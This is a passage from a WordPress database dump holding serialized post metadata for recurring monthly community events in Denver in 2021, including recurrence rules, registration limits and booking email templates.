8,'boldgrid_hide_page_title','0'),(129752,263608,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:0:\"\";s:14:\"EventStartDate\";s:19:\"2021-03-15 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-03-15 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(129753,263608,'_EventShowMapLink','1'),(129472,263596,'_EventDuration','3600'),(129468,263596,'_EventStartDate','2021-09-18 16:00:00'),(129469,263596,'_EventStartDateUTC','2021-09-18 22:00:00'),(129470,263596,'_EventEndDate','2021-09-18 17:00:00'),(129471,263596,'_EventEndDateUTC','2021-09-18 23:00:00'),(129982,263595,'protect_children',''),(129983,263595,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129986,263595,'_EventOrigin','events-calendar'),(129988,263595,'_RTECregistrationsDisabled','1'),(129985,263595,'_EventOrigin','events-calendar'),(129995,263595,'_EventShowMapLink','1'),(129996,263595,'_EventShowMap','1'),(129997,263595,'_EventCurrencySymbol',''),(129998,263595,'_EventCurrencyPosition','prefix'),(129999,263595,'_EventCost',''),(130000,263595,'_EventURL',''),(130001,263595,'_EventTimezone','America/Denver'),(130002,263595,'_dp_original','263319'),(130003,263595,'_EventVenueID','263589'),(130004,263595,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263590;a:2:{s:9:\"timestamp\";i:1616256000;s:8:\"duration\";i:3600;}i:263591;a:2:{s:9:\"timestamp\";i:1618675200;s:8:\"duration\";i:3600;}i:263592;a:2:{s:9:\"timestamp\";i:1621094400;s:8:\"duration\";i:3600;}i:263593;a:2:{s:9:\"timestamp\";i:1624118400;s:8:\"duration\";i:3600;}i:263594;a:2:{s:9:\"timestamp\";i:1626537600;s:8:\"duration\";i:3600;}i:263595;a:2:{s:9:\"timestamp\";i:1629561600;s:8:\"duration\";i:3600;}i:263596;a:2:{s:9:\"timestamp\";i:1631980800;s:8:\"duration\";i:3600;}i:263597;a:2:{s:9:\"timestamp\";i:1634400000;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(129992,263595,'_RTECmaxRegistrations','30'),(129993,263595,'boldgrid_hide_page_title','0'),(129994,263595,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(129984,263595,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129989,263595,'_RTECdeadlineType','start'),(129990,263595,'_RTECwhoCanRegister','any'),(129991,263595,'_RTEClimitRegistrations','0'),(129766,263608,'_EventTimezoneAbbr','MDT'),(129981,263595,'protect_children',''),(130017,263596,'_RTECmaxRegistrations','30'),(130018,263596,'boldgrid_hide_page_title','0'),(130019,263596,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130010,263596,'_EventOrigin','events-calendar'),(130020,263596,'_EventShowMapLink','1'),(130021,263596,'_EventShowMap','1'),(130022,263596,'_EventCurrencySymbol',''),(130023,263596,'_EventCurrencyPosition','prefix'),(130024,263596,'_EventCost',''),(130025,263596,'_EventURL',''),(130026,263596,'_EventTimezone','America/Denver'),(130027,263596,'_dp_original','263319'),(130028,263596,'_EventVenueID','263589'),(130029,263596,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263590;a:2:{s:9:\"timestamp\";i:1616256000;s:8:\"duration\";i:3600;}i:263591;a:2:{s:9:\"timestamp\";i:1618675200;s:8:\"duration\";i:3600;}i:263592;a:2:{s:9:\"timestamp\";i:1621094400;s:8:\"duration\";i:3600;}i:263593;a:2:{s:9:\"timestamp\";i:1624118400;s:8:\"duration\";i:3600;}i:263594;a:2:{s:9:\"timestamp\";i:1626537600;s:8:\"duration\";i:3600;}i:263595;a:2:{s:9:\"timestamp\";i:1629561600;s:8:\"duration\";i:3600;}i:263596;a:2:{s:9:\"timestamp\";i:1631980800;s:8:\"duration\";i:3600;}i:263597;a:2:{s:9:\"timestamp\";i:1634400000;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130011,263596,'_EventOrigin','events-calendar'),(151778,266078,'mec_display_cancellation_reason_in_single_page',''),(130013,263596,'_RTECregistrationsDisabled','1'),(130009,263596,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(130014,263596,'_RTECdeadlineType','start'),(130015,263596,'_RTECwhoCanRegister','any'),(130016,263596,'_RTEClimitRegistrations','0'),(130005,263596,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(130006,263596,'protect_children',''),(130007,263596,'protect_children',''),(130008,263596,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129762,263608,'_EventCurrencyPosition','prefix'),(129501,263597,'_EventStartDate','2021-10-16 16:00:00'),(129502,263597,'_EventStartDateUTC','2021-10-16 22:00:00'),(129767,263608,'_dp_original','263319'),(129503,263597,'_EventEndDate','2021-10-16 17:00:00'),(129504,263597,'_EventEndDateUTC','2021-10-16 23:00:00'),(129505,263597,'_EventDuration','3600'),(129768,263608,'_edit_lock','1611978267:2'),(129760,263608,'_EventDuration','5400'),(129761,263608,'_EventCurrencySymbol',''),(130031,263597,'protect_children',''),(129759,263608,'_EventEndDateUTC','2021-03-16 02:30:00'),(130032,263597,'protect_children',''),(130033,263597,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129763,263608,'_EventCost',''),(129764,263608,'_EventURL',''),(130054,263597,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263590;a:2:{s:9:\"timestamp\";i:1616256000;s:8:\"duration\";i:3600;}i:263591;a:2:{s:9:\"timestamp\";i:1618675200;s:8:\"duration\";i:3600;}i:263592;a:2:{s:9:\"timestamp\";i:1621094400;s:8:\"duration\";i:3600;}i:263593;a:2:{s:9:\"timestamp\";i:1624118400;s:8:\"duration\";i:3600;}i:263594;a:2:{s:9:\"timestamp\";i:1626537600;s:8:\"duration\";i:3600;}i:263595;a:2:{s:9:\"timestamp\";i:1629561600;s:8:\"duration\";i:3600;}i:263596;a:2:{s:9:\"timestamp\";i:1631980800;s:8:\"duration\";i:3600;}i:263597;a:2:{s:9:\"timestamp\";i:1634400000;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130042,263597,'_RTECmaxRegistrations','30'),(130043,263597,'boldgrid_hide_page_title','0'),(130044,263597,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130035,263597,'_EventOrigin','events-calendar'),(130045,263597,'_EventShowMapLink','1'),(130046,263597,'_EventShowMap','1'),(130047,263597,'_EventCurrencySymbol',''),(130048,263597,'_EventCurrencyPosition','prefix'),(130049,263597,'_EventCost',''),(130050,263597,'_EventURL',''),(130051,263597,'_EventTimezone','America/Denver'),(130052,263597,'_dp_original','263319'),(130053,263597,'_EventVenueID','263589'),(129979,263594,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263590;a:2:{s:9:\"timestamp\";i:1616256000;s:8:\"duration\";i:3600;}i:263591;a:2:{s:9:\"timestamp\";i:1618675200;s:8:\"duration\";i:3600;}i:263592;a:2:{s:9:\"timestamp\";i:1621094400;s:8:\"duration\";i:3600;}i:263593;a:2:{s:9:\"timestamp\";i:1624118400;s:8:\"duration\";i:3600;}i:263594;a:2:{s:9:\"timestamp\";i:1626537600;s:8:\"duration\";i:3600;}i:263595;a:2:{s:9:\"timestamp\";i:1629561600;s:8:\"duration\";i:3600;}i:263596;a:2:{s:9:\"timestamp\";i:1631980800;s:8:\"duration\";i:3600;}i:263597;a:2:{s:9:\"timestamp\";i:1634400000;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(129977,263594,'_dp_original','263319'),(129978,263594,'_EventVenueID','263589'),(129961,263594,'_EventOrigin','events-calendar'),(151779,266078,'boldgrid_hide_page_title','0'),(129963,263594,'_RTECregistrationsDisabled','1'),(129964,263594,'_RTECdeadlineType','start'),(129965,263594,'_RTECwhoCanRegister','any'),(129966,263594,'_RTEClimitRegistrations','0'),(129959,263594,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129958,263594,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129956,263594,'protect_children',''),(129957,263594,'protect_children',''),(146789,265639,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(129976,263594,'_EventTimezone','America/Denver'),(129967,263594,'_RTECmaxRegistrations','30'),(129968,263594,'boldgrid_hide_page_title','0'),(129969,263594,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(129960,263594,'_EventOrigin','events-calendar'),(129970,263594,'_EventShowMapLink','1'),(129971,263594,'_EventShowMap','1'),(129972,263594,'_EventCurrencySymbol',''),(129973,263594,'_EventCurrencyPosition','prefix'),(129974,263594,'_EventCost',''),(129975,263594,'_EventURL',''),(129769,263608,'_edit_last','2'),(129435,263595,'_EventStartDate','2021-08-21 16:00:00'),(129922,263592,'_EventCurrencySymbol',''),(129923,263592,'_EventCurrencyPosition','prefix'),(129924,263592,'_EventCost',''),(129925,263592,'_EventURL',''),(129926,263592,'_EventTimezone','America/Denver'),(129927,263592,'_dp_original','263319'),(129928,263592,'_EventVenueID','263589'),(129929,263592,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263590;a:2:{s:9:\"timestamp\";i:1616256000;s:8:\"duration\";i:3600;}i:263591;a:2:{s:9:\"timestamp\";i:1618675200;s:8:\"duration\";i:3600;}i:263592;a:2:{s:9:\"timestamp\";i:1621094400;s:8:\"duration\";i:3600;}i:263593;a:2:{s:9:\"timestamp\";i:1624118400;s:8:\"duration\";i:3600;}i:263594;a:2:{s:9:\"timestamp\";i:1626537600;s:8:\"duration\";i:3600;}i:263595;a:2:{s:9:\"timestamp\";i:1629561600;s:8:\"duration\";i:3600;}i:263596;a:2:{s:9:\"timestamp\";i:1631980800;s:8:\"duration\";i:3600;}i:263597;a:2:{s:9:\"timestamp\";i:1634400000;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(129436,263595,'_EventStartDateUTC','2021-08-21 22:00:00'),(129369,263593,'_EventStartDate','2021-06-19 16:00:00'),(129370,263593,'_EventStartDateUTC','2021-06-19 22:00:00'),(129371,263593,'_EventEndDate','2021-06-19 17:00:00'),(129437,263595,'_EventEndDate','2021-08-21 17:00:00'),(129372,263593,'_EventEndDateUTC','2021-06-19 23:00:00'),(129373,263593,'_EventDuration','3600'),(129786,263610,'protect_children',''),(129939,263593,'_RTECdeadlineType','start'),(129940,263593,'_RTECwhoCanRegister','any'),(129941,263593,'_RTEClimitRegistrations','0'),(129942,263593,'_RTECmaxRegistrations','30'),(129784,263610,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1611953228;s:12:\"_EventOrigin\";i:1611953228;s:13:\"_thumbnail_id\";i:1611953228;s:26:\"_RTECregistrationsDisabled\";i:1611953228;s:17:\"_RTECdeadlineType\";i:1611953228;s:19:\"_RTECwhoCanRegister\";i:1611953228;s:23:\"_RTEClimitRegistrations\";i:1611953228;s:21:\"_RTECmaxRegistrations\";i:1611953228;s:24:\"boldgrid_hide_page_title\";i:1611953228;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953228;s:13:\"_EventShowMap\";i:1611953228;s:13:\"_EventVenueID\";i:1611953472;s:15:\"_EventStartDate\";i:1611953472;s:13:\"_EventEndDate\";i:1611953472;s:18:\"_EventStartDateUTC\";i:1611953472;s:16:\"_EventEndDateUTC\";i:1611953472;s:14:\"_EventDuration\";i:1611953472;s:20:\"_EventCurrencySymbol\";i:1611953228;s:22:\"_EventCurrencyPosition\";i:1611953228;s:10:\"_EventCost\";i:1611953228;s:9:\"_EventURL\";i:1611953228;s:14:\"_EventTimezone\";i:1611953228;s:18:\"_EventTimezoneAbbr\";i:1611953228;s:12:\"_dp_original\";i:1611953228;s:10:\"_edit_last\";i:1611953299;s:10:\"post_title\";i:1611953519;s:12:\"post_content\";i:1611953784;s:16:\"tribe_events_cat\";i:1611978671;s:11:\"post_status\";i:1611953471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(129938,263593,'_RTECregistrationsDisabled','1'),(129785,263610,'_EventOrigin','events-calendar'),(129783,263610,'protect_children',''),(129936,263593,'_EventOrigin','events-calendar'),(129934,263593,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129951,263593,'_EventTimezone','America/Denver'),(129952,263593,'_dp_original','263319'),(129953,263593,'_EventVenueID','263589'),(129954,263593,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263590;a:2:{s:9:\"timestamp\";i:1616256000;s:8:\"duration\";i:3600;}i:263591;a:2:{s:9:\"timestamp\";i:1618675200;s:8:\"duration\";i:3600;}i:263592;a:2:{s:9:\"timestamp\";i:1621094400;s:8:\"duration\";i:3600;}i:263593;a:2:{s:9:\"timestamp\";i:1624118400;s:8:\"duration\";i:3600;}i:263594;a:2:{s:9:\"timestamp\";i:1626537600;s:8:\"duration\";i:3600;}i:263595;a:2:{s:9:\"timestamp\";i:1629561600;s:8:\"duration\";i:3600;}i:263596;a:2:{s:9:\"timestamp\";i:1631980800;s:8:\"duration\";i:3600;}i:263597;a:2:{s:9:\"timestamp\";i:1634400000;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(129955,263594,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129931,263593,'protect_children',''),(129932,263593,'protect_children',''),(129933,263593,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(129935,263593,'_EventOrigin','events-calendar'),(129930,263593,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953569;s:12:\"_EventOrigin\";i:1611953569;s:13:\"_thumbnail_id\";i:1611953569;s:26:\"_RTECregistrationsDisabled\";i:1611953569;s:17:\"_RTECdeadlineType\";i:1611953569;s:19:\"_RTECwhoCanRegister\";i:1611953569;s:23:\"_RTEClimitRegistrations\";i:1611953569;s:21:\"_RTECmaxRegistrations\";i:1611953569;s:24:\"boldgrid_hide_page_title\";i:1611953569;s:16:\"_EventRecurrence\";i:1611953569;s:17:\"_EventShowMapLink\";i:1611953569;s:13:\"_EventShowMap\";i:1611953569;s:20:\"_EventCurrencySymbol\";i:1611953569;s:22:\"_EventCurrencyPosition\";i:1611953569;s:10:\"_EventCost\";i:1611953569;s:9:\"_EventURL\";i:1611953569;s:14:\"_EventTimezone\";i:1611953569;s:12:\"_dp_original\";i:1611953569;s:13:\"_EventVenueID\";i:1611953569;s:31:\"_TribeEventsPRO_R